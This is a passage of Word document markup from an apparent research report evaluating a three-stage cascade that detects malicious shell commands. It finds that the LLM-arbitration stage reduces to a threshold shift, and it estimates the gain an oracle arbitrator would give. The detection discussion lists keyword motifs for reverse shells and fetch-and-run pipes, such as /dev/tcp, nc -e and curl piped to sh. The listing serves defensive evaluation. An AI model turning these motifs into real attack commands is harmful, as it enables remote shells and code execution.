    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if it matches one of six hard LotL motifs — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc -e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash -i</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl … | sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wget … |sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>base64 -d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — and benign otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the 146 Dataset-1 commands routed to it, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the stub fired zero times.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2's 101, it fired twice. It is, on this band, a constant classifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that returns "benign".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>This is not bad luck; it is structural. Thirty-nine Dataset-1 test commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">match one of the six motifs and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>all thirty-nine are attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — which is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>exactly why the supervised model is already confident about them, and exactly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>why not one of them lands in the [0.35, 0.65] uncertainty band. The stub's rule</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>set and the router's selection criterion are anti-correlated by construction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the commands it can recognise are the ones stage 2 never asks it about, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>commands it is asked about are the ones no keyword rule resolves. Its coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on the test sets is 1.3% and 0.2% of traffic; its coverage on the traffic it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>actually shown is 0% and 2%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The consequence is that stage 3, as run, is not arbitration at all. Forcing an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>entire probability band to "benign" is arithmetically identical to moving the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>decision threshold from 0.50 to 0.65 for those rows. Every one of the cascade's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>30 avoided false alarms and 30 missed attacks on Dataset 1 is that threshold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shift, relabelled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The dominance test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>If the cascade's operating point is a threshold shift, a threshold should be</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>able to reach it. We swept stage 2's decision threshold from 0.05 to 0.95 in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.01 steps and asked how many single scalar values match or beat the full</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cascade on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> precision and recall: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dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cascade (P / R / F1 / FPR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>best single threshold on stage 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>thresholds dominating the cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9083 / 0.8320 / 0.8685 / 0.0280</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>t = 0.65 → 0.9088 / 0.8373 / 0.8716 / 0.0280</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (t = 0.65, 0.66, 0.67)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8863 / 0.7975 / 0.8396 / 0.0341</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>t = 0.66 → 0.8863 / 0.7975 / 0.8396 / 0.0341</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (t = 0.66)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On Dataset 1, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p ≥ 0.65</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> beats the three-stage cascade on precision, on recall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and on F1 at an identical false-alarm rate, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p ≥ 0.67</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> beats it on all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>three while also running cleaner (FPR 0.0258). On Dataset 2 the match is not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">merely close — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p ≥ 0.66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reproduces the cascade's confusion matrix to four</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>decimal places on every headline metric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**An Isolation Forest, an XGBoost-hybrid and an LLM arbitrator, wired into a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>three-stage routing architecture, produce an operating point reachable by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">changing one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> comparison in the single model they contain.** And if the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>objective is F1 rather than precision, the best single threshold — 0.53 on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>D1, 0.52 on D2 — beats the cascade by 0.98 and 0.89 points while requiring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>no second model, no third stage and no inference calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>This is the finding of Chapter 8.4, and it is a negative one. It does not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>depend on the stub's weakness being fixed: it is a statement about what the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>architecture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> delivered, measured against the cheapest possible alternative</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rather than against no alternative at all.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What the routing does get right — and the ceiling it implies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>One component survives, and it matters for the bonus chapter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The router — "send stage 2's low-confidence band to a second opinion" — selects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exactly the right rows. Attack prevalence inside the band is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.411</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (D1) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.386</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (D2) against 0.250 overall, so the band is enriched for attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rather than being a pocket of ambiguous noise. More tellingly, the hybrid's own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">accuracy on the band is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>58.9%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>63.4%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>95.6%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>94.1%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on everything outside it. The router is a working detector of the strong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>model's blind spot: it isolates 4.8% of traffic on which the project's best</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>model is barely better than a coin flip.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">That gap is worth something to whoever can close it. Substituting a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>perfect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>arbitrator on the band — an oracle, as an upper bound rather than a claim —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>gives: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r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hybrid alone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>full cascade (stub)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cascade with oracle arbitration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8761</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8685</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9132</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8396</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8849</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A flawless second opinion on 4.8% / 5.3% of commands is worth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>+3.7 F1 points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>over the best single model on both corpora. That is the headroom the live LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>layer is competing for, and it is the number the bonus chapter should be scored</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>against — not against zero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>It also fixes the bar. The stub's accuracy on the band is 58.9% / 63.4%, which</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
